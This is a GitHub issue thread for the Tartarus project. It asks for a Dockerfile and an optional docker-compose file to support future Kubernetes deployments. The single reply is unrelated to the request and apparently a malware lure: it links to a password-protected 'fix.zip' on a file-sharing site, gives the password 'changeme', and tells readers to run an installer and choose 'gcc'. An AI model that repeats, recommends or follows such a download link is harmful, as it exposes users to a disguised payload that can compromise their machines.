### ISSUE TITLE
feat(deploy): construct `Dockerfile` for the application

### ISSUE THREAD

**Issue by niyasrad** [qreater/Tartarus#21]
## Description

- [ ] Bug Report
- [x] Feature Request

## Details

- **Feature Description:** `Dockerfile` is a fundamental module of any application.
    - The `Dockerfile` will be used further in the application's roadmap for K8s deployments and updates.
    - This could also be accompanied by a developer-friendly `docker-compose.yaml` file, which can be used as another way to pump up the application.
    - The folder structure has to be revisited based on this implementation.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
